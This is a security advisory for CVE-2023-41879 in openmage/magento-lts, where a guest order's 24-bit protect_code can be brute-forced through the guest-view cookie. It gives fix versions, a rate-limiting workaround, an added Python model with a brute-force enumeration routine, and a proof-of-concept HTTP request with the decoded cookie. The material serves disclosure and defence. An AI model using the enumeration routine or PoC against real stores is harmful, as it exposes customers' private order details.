Insecure Randomness Affecting openmage/magento-lts package, versions <19.5.1, >=20.0.0 <20.1.1
- Snyk ID SNYK-PHP-OPENMAGEMAGENTOLTS-5892784
- published 12 Sep 2023
- disclosed 11 Sep 2023
- credit Frank Rochlitzer
Introduced: 11 Sep 2023
- CVE-2023-41879
How to fix?
Upgrade openmage/magento-lts to version 19.5.1 (19.x line) or 20.1.1 (20.x line) or higher.
Overview
openmage/magento-lts is an unofficial, community-driven long-term support fork of Magento 1.
Affected versions of this package are vulnerable to Insecure Randomness because an order's protect_code is only 6 hexadecimal characters long (24 bits, 16^6 = 16,777,216 possible values), a keyspace far too small to withstand a brute-force attack. As a result, a guest order may be viewed without authentication by presenting a guest-view cookie that carries the order's protect_code: an attacker targeting a specific order can enumerate candidate protect_code values until the order page is returned.
Note: each order has its own protect_code, so exposing each order would require a separate brute-force attack.
Workaround
Implementing rate-limiting at the web server would help mitigate the issue. In particular, a very strict rate limit (e.g. 1 request per minute per IP) for the specific route (sales/guest/view/) would effectively mitigate the issue: at that rate, exhausting the 16,777,216-value keyspace would take roughly 32 years. A per-IP limit can be diluted by spreading attempts across many source addresses, so treat it as a stopgap until the upgrade is applied.
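To make the numbers behind the Overview and the Workaround concrete, the following Python script (an added example, not OpenMage code) models the guest-view cookie check and the effect of a per-IP rate limit on the route. The cookie layout base64("protect_code:increment_id") is what the PoC cookie on this page decodes to; the GuestOrderView class, its in-memory order table, the 32-hex-character hardened length and the 100 requests/second attacker rate are assumptions for illustration.

```python
"""Added example (not OpenMage code): why a 6-hex protect_code in the guest-view cookie
is brute-forceable, and how a per-IP rate limit on the route changes the economics."""
from __future__ import annotations

import base64
import hmac
import secrets
import time
from urllib.parse import unquote

VULNERABLE_HEX_LEN = 6    # protect_code length in affected versions (24 bits)
HARDENED_HEX_LEN = 32     # assumption for illustration: a 128-bit code


def keyspace(hex_len: int) -> int:
    """Number of distinct protect_codes of the given hex length."""
    return 16 ** hex_len


def encode_guest_view_cookie(protect_code: str, increment_id: str) -> str:
    """guest-view cookie value: base64("<protect_code>:<increment_id>")."""
    return base64.b64encode(f"{protect_code}:{increment_id}".encode()).decode()


def decode_guest_view_cookie(cookie: str) -> tuple[str, str]:
    """Inverse of the above; accepts the URL-encoded form seen in a raw request."""
    raw = base64.b64decode(unquote(cookie), validate=True).decode()
    protect_code, increment_id = raw.split(":", 1)
    return protect_code, increment_id


def generate_protect_code(hex_len: int) -> str:
    """CSPRNG-backed hex protect_code of the requested length."""
    return secrets.token_hex((hex_len + 1) // 2)[:hex_len]


class GuestOrderView:
    """Toy model of the sales/guest/view check (assumed, not the real controller).
    orders maps increment_id -> protect_code. rate_limit_per_minute=None models an
    unpatched deployment; an integer models the per-IP web-server limit from the
    advisory's Workaround."""

    def __init__(self, orders: dict[str, str], rate_limit_per_minute: int | None = None):
        self.orders = orders
        self.rate_limit_per_minute = rate_limit_per_minute
        self._hits: dict[str, list[float]] = {}

    def _allowed(self, ip: str, now: float) -> bool:
        if self.rate_limit_per_minute is None:
            return True
        recent = [t for t in self._hits.get(ip, []) if now - t < 60.0]
        if len(recent) >= self.rate_limit_per_minute:
            self._hits[ip] = recent
            return False              # the web server would answer 429 here
        recent.append(now)
        self._hits[ip] = recent
        return True

    def view(self, cookie: str, ip: str = "203.0.113.7", now: float | None = None) -> bool:
        """True when the cookie grants access to the order it names."""
        now = time.monotonic() if now is None else now
        if not self._allowed(ip, now):
            return False
        try:
            protect_code, increment_id = decode_guest_view_cookie(cookie)
        except (ValueError, UnicodeDecodeError):
            return False
        expected = self.orders.get(increment_id)
        if expected is None:
            return False
        # constant-time comparison of the stored and presented codes
        return hmac.compare_digest(expected.encode(), protect_code.encode())


def brute_force(view: GuestOrderView, increment_id: str, hex_len: int,
                max_attempts: int, requests_per_second: float = 100.0) -> str | None:
    """Enumerate protect_code candidates for one known increment_id at the given
    request rate; returns the accepted code, or None if none was accepted."""
    for n in range(min(max_attempts, keyspace(hex_len))):
        candidate = format(n, f"0{hex_len}x")
        cookie = encode_guest_view_cookie(candidate, increment_id)
        if view.view(cookie, now=n / requests_per_second):
            return candidate
    return None


def hours_to_exhaust(hex_len: int, requests_per_minute: float) -> float:
    """Worst-case time to try every code at a sustained request rate."""
    return keyspace(hex_len) / requests_per_minute / 60.0


if __name__ == "__main__":
    # Constructed sample: the PoC cookie decodes to protect_code 362c28 for order 100000431.
    print(decode_guest_view_cookie("MzYyYzI4OjEwMDAwMDQzMQ%3D%3D"))
    print(f"{VULNERABLE_HEX_LEN} hex chars -> {keyspace(VULNERABLE_HEX_LEN):,} codes; "
          f"{hours_to_exhaust(VULNERABLE_HEX_LEN, 6000):.1f} h at 100 req/s, "
          f"{hours_to_exhaust(VULNERABLE_HEX_LEN, 1) / 24 / 365:.1f} years at 1 req/min")
    print(f"{HARDENED_HEX_LEN} hex chars -> "
          f"{hours_to_exhaust(HARDENED_HEX_LEN, 6000) / 24 / 365:.3e} years at 100 req/s")
```

Running the script shows the PoC cookie decoding to ('362c28', '100000431'), the 6-hex keyspace of 16,777,216 codes being covered in under 47 hours at 100 requests/second (half that on average), and the same keyspace taking about 32 years at the Workaround's 1 request per minute, while a 32-hex code is out of reach at any rate. In nginx the Workaround corresponds to a limit_req_zone keyed on the client address with rate=1r/m, applied with limit_req in a location matching sales/guest/view/.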
PoC
Request:
GET /magento19/index.php/default/sales/guest/view/ HTTP/1.1
Host: localhost.local
Cookie: guest-view=MzYyYzI4OjEwMDAwMDQzMQ%3D%3D;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost.local/magento19/index.php/default/egovs_checkout/multipage/successview/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
The guest-view cookie value (URL-decoded: MzYyYzI4OjEwMDAwMDQzMQ==) is the base64 encoding of 362c28:100000431, i.e. the 6-hex-character protect_code followed by the order's increment ID. An attacker holds the second field fixed for the target order and iterates the first until the order page is returned.